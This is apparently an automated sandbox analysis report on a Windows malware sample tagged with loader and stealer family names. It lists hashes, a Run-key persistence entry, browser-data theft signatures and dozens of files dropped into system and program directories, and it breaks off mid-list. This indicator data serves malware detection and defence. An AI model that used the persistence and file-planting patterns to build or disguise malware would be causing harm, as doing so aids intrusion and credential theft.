Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20250619-en -
resource tags
arch:x64arch:x86image:win11-20250619-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/07/2025, 12:10
Static task
static1
Behavioral task
behavioral1
Sample
2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Resource
win10v2004-20250619-en
Behavioral task
behavioral2
Sample
2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
Resource
win11-20250619-en
General
-
Target
2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe
-
Size
17.0MB
-
MD5
427915f92d6dfee464abcbe95899af89
-
SHA1
26d814129899cf6fb1e96145b8e04b84515fc33d
-
SHA256
0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440
-
SHA512
7a0ce3b689d2cd75424073ea3fe19f4c2c6ccace1ae953c956d1c2506c58886277bfa1dc80cc62ec332bafb4b059e89b0acb9018ff3c36abc93c0eef3a3e5cb6
-
SSDEEP
49152:XYgph7GBfWSkph7GBfWBWcHPH90hOqZEDkYOMwwnMb4PmyVl:XX77GBfWz77GBfWBWC0RpYOXwnS4rVl
Malware Config
Signatures
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\cmd.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\dfrgui.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\mcbuilder.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\mmc.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\poqexec.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\RdpSaProxy.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\TpmTool.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\where.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\notepad.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\TSTheme.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\TSTheme.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\tttracer.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\certreq.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\Com_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\MRINFO.EXE_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\notepad.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\certreq.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\printui.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\rundll32.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\expand.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\SystemPropertiesProtection.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\tcmsetup.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\mcbuilder.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\powercfg.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\raserver.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\SystemPropertiesRemote.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\taskkill.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\comp.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\Dism.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\fsutil.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\secinit.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\SpatialAudioLicenseSrv.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\SystemUWPLauncher.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\ByteCodeGenerator.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\cleanmgr.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\ctfmon.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\ieUnatt.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\tasklist.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\userinit.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\F12\IEChooser.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\agentactivationruntimestarter.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\choice.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\dccw.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\tar.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\cleanmgr.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\DevicePairingWizard.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\eudcedit.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\forfiles.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\PhotoScreensaver.scr 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\setupugc.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\timeout.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\eventvwr.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\PING.EXE- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\replace.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\srdelayed.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\user.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\WerFault.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\cmmon32.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\tar.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\odbcconf.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\SysWOW64\relog.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Media Player\wmpconfig.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Windows Media Player\wmplayer.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_helper.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateBroker.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jre-1.8\bin\java.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\elevation_service.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jre-1.8\bin\klist.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\StickyNotesStub.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\dotnet\dotnet.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\Office16\msoev.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Windows Media Player\wmlaunch.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\jar.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jre-1.8\bin\rmid.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Mozilla Firefox\private_browsing.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdate.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\ink\ShapeCollector.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Windows Mail\wabmig.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Windows Media Player\wmlaunch.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\xjc.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Java\jdk-1.8\bin\extcheck.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\7-Zip\Uninstall.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\GameBar.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Installer\setup.exe 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_proxy.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Program Files (x86)\Windows Media Player\wmplayer.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\WinSxS\amd64_microsoft-windows-a..screencontentserver_31bf3856ad364e35_10.0.22000.1_none_5d8b0964af4f5e05\LockScreenContentServer.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-com-dtc-tracing_31bf3856ad364e35_10.0.22000.1_none_6e22e868f79867b0\msdtcvtr.bat_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\ie4uinit.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\r\UsoClient.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrs.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.376_none_c7a79de54d7799ec\f\SyncAppvPublishingServer.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-e..-mdmdiagnosticstool_31bf3856ad364e35_10.0.22000.1_none_b5447a0b77a5213f\MdmDiagnosticsTool.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.22000.1_none_12ea1a72b4886bec\scp.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-displayswitch_31bf3856ad364e35_10.0.22000.1_none_43054e9f294487ea\DisplaySwitch.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-d..-japanese-utilities_31bf3856ad364e35_10.0.22000.1_none_4dc986ddab447f27\IMJPUEX.EXE_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\x86_aspnet_regbrowsers_b03f5f7f11d50a3a_10.0.22000.1_none_a631d85ed7b16283\aspnet_regbrowsers.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..perience-ait-static_31bf3856ad364e35_10.0.22000.1_none_872834aeb30e11cf\aitstatic.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\audit.exe- 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\x86_netfx4-aspnet_wp_exe_b03f5f7f11d50a3a_4.0.15806.256_none_4e9ea93e588a5995\aspnet_wp.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\r\wifitask.exe_ 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe File created 